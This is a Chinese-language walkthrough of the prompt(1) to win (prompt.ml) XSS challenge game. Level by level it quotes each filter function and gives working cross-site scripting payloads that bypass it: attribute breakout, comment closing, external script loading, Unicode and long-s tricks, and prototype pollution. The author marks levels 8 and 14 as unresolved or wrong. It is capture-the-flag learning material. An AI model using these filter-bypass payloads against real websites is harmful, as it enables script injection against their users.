prompt(1) to win 通关笔记

网址：http://prompt.ml
基于alert(1)做的xss闯关游戏

level 0

function escape(input) {
    // warm up
    // script should be executed without user interaction
    return '<input type="text" value="' + input + '">';
}

代码是input标签的xss，没有过滤，直接闭合双引号插入常规paylaod即可

1	a"><img src=x onerror=prompt(1)>//

level 1

function escape(input) {
    // tags stripping mechanism from ExtJS library
    // Ext.util.Format.stripTags
    var stripTagsRE = /<\/?[^>]+>/gi;
    input = input.replace(stripTagsRE, '');

    return '<article>' + input + '</article>';
}

查看代码，发现是被正则过滤，只要有尖括号，且尖括号里有内容或有</> 均替换为空
以下均会过滤：

<h1>
<script>
<sss>
</>

经过测试，发现只要有>就会被过滤，且此处input内容被包裹在<article>标签中，如果要解析，必须要插入标签才能执行。

那么这里<script>肯定用不了了，只能插入单标签

考虑到了js的自动补全特性（但实际上是开发者做的防止页面混乱的补全措施）只输入一半，用单行注释注释掉后面的双引号，即可成功
(经过测试，多行注释也行，只要注释掉就行)

#onload事件会在页面或图像加载完成后立即发生
<img src=x onload=alert(1)//
<img src=x onerror=alert(1)//
<img src=x onerror=alert(1)<!--
<img src=x onerror="alert(1)"

level 2

function escape(input) {
    //                      v-- frowny face
    input = input.replace(/[=(]/g, '');

    // ok seriously, disallows equal signs and open parenthesis
    return input;
}

此题涉及到了浏览器渲染顺序
https://segmentfault.com/q/1010000002393260

先写一下我的理解
1.浏览器只负责url编码，url解码永远在服务器端。因为浏览器对于url永远是发起者，服务器是接受者，只需要服务器理解即可，所以url解码永远发生在服务器端。
PS：仅有在javascript:alert(1)这种情况下，点击后浏览器作为本地的服务器进行url解码，用于理解url内容。
2.浏览器先进行HTML解码，再进行js解码。

再来说这道题，因为是dom动态正则的input内容，所以使用html编码可以绕过正则检查，而在浏览器渲染dom树时，先解析了html的<svg> 和(，而后才解析了js，所以可以执行成功。
跟踪结果：
设置断点

运行，发现到escape函数时，html编码的(没有解析：

将代码写入sandbox（prompt(1)游戏是在sandbox里展示效果的，所以会有一次写入sandbox paylaod的操作）：

将input的内容写入dom执行真正的解析操作（可参考浏览器解析流程）：

然后浏览器解析svg标签为xml

代码中过滤了=和( 破坏了常规的paylaod，所以payload如下：

1 2	html编码绕过正则匹配 <svg><script>prompt(1)</script>

level 3

function escape(input) {
    // filter potential comment end delimiters
    input = input.replace(/->/g, '_');

    // comment the input to avoid script execution
    return '<!-- ' + input + ' -->';
}

使用–!>闭合注释即可

1	--!><script>prompt(1)</script>

level 4

function escape(input) {
    // make sure the script belongs to own site
    // sample script: http://prompt.ml/js/test.js
    if (/^(?:https?:)?\/\/prompt\.ml\//i.test(decodeURIComponent(input))) {
        var script = document.createElement('script');
        script.src = input;
        return script.outerHTML;
    } else {
        return 'Invalid resource.';
    }
}

根据过滤代码，判断是绕过正则，引入外部js

使用@符号，让浏览器取后面的域名引入js(chrome实现失败，firefox可以成功，chrome引入js提示blocked:origin)
本地启动web服务，并在根目录创建xss.js写入如下代码：

1 2	prompt(1) alert(1)

1	http://prompt.ml%2f@prompt.ml/js/test.js

level 5

function escape(input) {
    // apply strict filter rules of level 0
    // filter ">" and event handlers
    input = input.replace(/>|on.+?=|focus/gi, '_');

    return '<input value="' + input + '" type="text">';
}

分析代码，过滤了> on事件 focus方法 'onclick='这一类
但是是input标签，所以可以改变type属性，变成图片，然后利用换行绕过=号匹配，即可成功插入

1 2	" type="image" src=x onerror ="prompt(1)

level 6

function escape(input) {
    // let's do a post redirection
    try {
        // pass in formURL#formDataJSON
        // e.g. http://httpbin.org/post#{"name":"Matt"}
        var segments = input.split('#');
        var formURL = segments[0];
        var formData = JSON.parse(segments[1]);

        var form = document.createElement('form');
        form.action = formURL;
        form.method = 'post';

        for (var i in formData) {
            var input = form.appendChild(document.createElement('input'));
            input.name = i;
            input.setAttribute('value', formData[i]);
        }

        return form.outerHTML + '                         \n\
<script>                                                  \n\
    // forbid javascript: or vbscript: and data: stuff    \n\
    if (!/script:|data:/i.test(document.forms[0].action)) \n\
        document.forms[0].submit();                       \n\
    else                                                  \n\
        document.write("Action forbidden.")               \n\
</script>                                                 \n\
        ';
    } catch (e) {
        return 'Invalid form data.';
    }
}

根据代码，发现是url#post的格式提交表单。并且action过滤了script、data等伪协议。
所以尝试使用 javascript:alert(1)
但是被过滤了，之后了解到了。form表单后面的action会覆盖前面的，所以此处可以构造如下payload:

1 2	javascript:alert(1)#{"action":"123"} javascript:prompt(1)#{"action":"123"}

level 7

function escape(input) {
    // pass in something like dog#cat#bird#mouse...
    var segments = input.split('#');
    return segments.map(function(title) {
        // title can only contain 12 characters
        return '<p class="comment" title="' + title.slice(0, 12) + '"></p>';
    }).join('\n');
}

代码限制了paylaod长度为12，所以需要注释绕过，经过测试需要使用/**/

js的注释有2中

// 单行注释
/**/多行注释
HTML 注释<!-- -->
不要搞混

payload：

1	"><script>/#/prompt(/#/1)/#/</script>

level 8 这题我也没搞明白

function escape(input) {
    // prevent input from getting out of comment
    // strip off line-breaks and stuff
    input = input.replace(/[\r\n</"]/g, '');

    return '                                \n\
<script>                                    \n\
    // console.log("' + input + '");        \n\
</script> ';
}

思路是，根据编码绕过正则，续利用浏览器特性：
使用unicode绕过,chrome有效，火狐无效

1 2	浏览器console输入以下字符可获得paylaod '\u2028alert(1)\u2028-->'

chrome下：

1	alert(1) -->

IE下

level 9

function escape(input) {
    // filter potential start-tags
    input = input.replace(/<([a-zA-Z])/g, '<_$1');
    // use all-caps for heading
    input = input.toUpperCase();

    // sample input: you shall not pass! => YOU SHALL NOT PASS!
    return '<h1>' + input + '</h1>';
}

又是一个神奇的题目，编码绕过。这次是拉丁字母绕过正则匹配:
https://unicode-table.com/cn/017F/
ſ是拉丁字母的s，可以绕过正则被解析。

paylaod：

1	<ſcript ſrc=http://localhost/xss.js></ſcript>

level 10

function escape(input) {
    // (╯°□°）╯︵ ┻━┻
    input = encodeURIComponent(input).replace(/prompt/g, 'alert');
    // ┬──┬ ノ( ゜-゜ノ) chill out bro
    input = input.replace(/'/g, '');

    // (╯°□°）╯︵ /(.□. \）DONT FLIP ME BRO
    return '<script>' + input + '</script> ';
}

过滤单引号为空，prompt替换为alert
直接payload：
prom'pt(1)

level 11

function escape(input) {
    // name should not contain special characters
    var memberName = input.replace(/[[|\s+*/\\<>&^:;=~!%-]/g, '');

    // data to be parsed as JSON
    var dataString = '{"action":"login","message":"Welcome back, ' + memberName + '."}';

    // directly "parse" data in script context
    return '                                \n\
<script>                                    \n\
    var data = ' + dataString + ';          \n\
    if (data.action === "login")            \n\
        document.write(data.message)        \n\
</script> ';
}

js特性，后面的变量会覆盖前面的

发现如果名字相同，一定会输出后面，这也就是需要构造"message":prompt(1)
可是原先有引号，想闭合，发现正则表达式几乎全部过滤，所以只能另想办法
这里的技巧是利用字母操作符来绕过限制，例如in instanceof等等，在这里这两个可以执行成功，payload为"(prompt(1))instanceof"或者"(prompt(1))in"

level 12

function escape(input) {
    // in Soviet Russia...
    input = encodeURIComponent(input).replace(/'/g, '');
    // table flips you!
    input = input.replace(/prompt/g, 'alert');

    // ノ┬─┬ノ ︵ ( \o°o)\
    return '<script>' + input + '</script> ';
}

和第十题很像，但是顺序变了一下，可以用eval函数来执行js，
eval((630038579).toString(30))(1)
因为单引号被过滤，尝试atob解码base64没成功
还有很多方法，参考链接
https://blog.csdn.net/Ni9htMar3/article/details/77938899

level 13

 function escape(input) {
    // extend method from Underscore library
    // _.extend(destination, *sources) 
    function extend(obj) {
        var source, prop;
        for (var i = 1, length = arguments.length; i < length; i++) {
            source = arguments[i];
            for (prop in source) {
                obj[prop] = source[prop];
            }
        }
        return obj;
    }
    // a simple picture plugin
    try {
        // pass in something like {"source":"http://sandbox.prompt.ml/PROMPT.JPG"}
        var data = JSON.parse(input);
        var config = extend({
            // default image source
            source: 'http://placehold.it/350x150'
        }, JSON.parse(input));
        // forbit invalid image source
        if (/[^\w:\/.]/.test(config.source)) {
            delete config.source;
        }
        // purify the source by stripping off "
        var source = config.source.replace(/"/g, '');
        // insert the content using mustache-ish template
        return '<img src="{{source}}">'.replace('{{source}}', source);
    } catch (e) {
        return 'Invalid image data.';
    }
}

大致看了一遍代码，逻辑应该是如下(偷看答案)：
输入json，进入JSON.parse解析，不是json抛出异常、是json取其中的source的值，然后进入extend()把默认的属性替换为输入的，然后是正则判断source对应的值中是否有不属于url的符号，有则删去这个值，将source属性删除。
每个对象都会在其内部初始化一个属性，就是proto，当我们访问对象的属性时，如果对象内部不存在这个属性，那么就会去proto里面找这个属性。

那么基本上就是构造{"source":"'","__proto__":{"source":"onerror=prompt(1)"}},由于前面有非法字符’，则会删除，但是在替换的时候由于过滤了”,无法闭合，那么正好有一种特殊的替换方式

Pattern	Inserts
$$	匹配处删除并插入带$的字符串
$’	在匹配到字符后删除，并在字符结束后面增加内融容
$`	匹配到之后将整串插入，删除匹配到的内容
$&	匹配到之后插入内容
$n	Where n is a positive integer less than 100, inserts the nth parenthesized submatch string, provided the first argument was a RegExp object. Note that this is 1-indexed.

具体如下图:

所以payload如下:

1	{"source":"'","__proto__":{"source":"$`onerror=prompt(1)>"}}

level 14(答案不对，思考中)

function escape(input) {
    // I expect this one will have other solutions, so be creative :)
    // mspaint makes all file names in all-caps :(
    // too lazy to convert them back in lower case
    // sample input: prompt.jpg => PROMPT.JPG
    input = input.toUpperCase();
    // only allows images loaded from own host or data URI scheme
    input = input.replace(/\/\/|\w+:/g, 'data:');
    // miscellaneous filtering
    input = input.replace(/[\\&+%\s]|vbs/gi, '_');

    return '<img src="' + input + '">';
}

level 15

function escape(input) {
    // sort of spoiler of level 7
    input = input.replace(/\*/g, '');
    // pass in something like dog#cat#bird#mouse...
    var segments = input.split('#');

    return segments.map(function(title, index) {
        // title can only contain 15 characters
        return '<p class="comment" title="' + title.slice(0, 15) + '" data-comment=\'{"id":' + index + '}\'></p>';
    }).join('\n');
}

和level 7 一样，用html注释即可，payload如下：

1	"><svg><!--#--><script><!--#-->prompt(1<!--#-->)</script>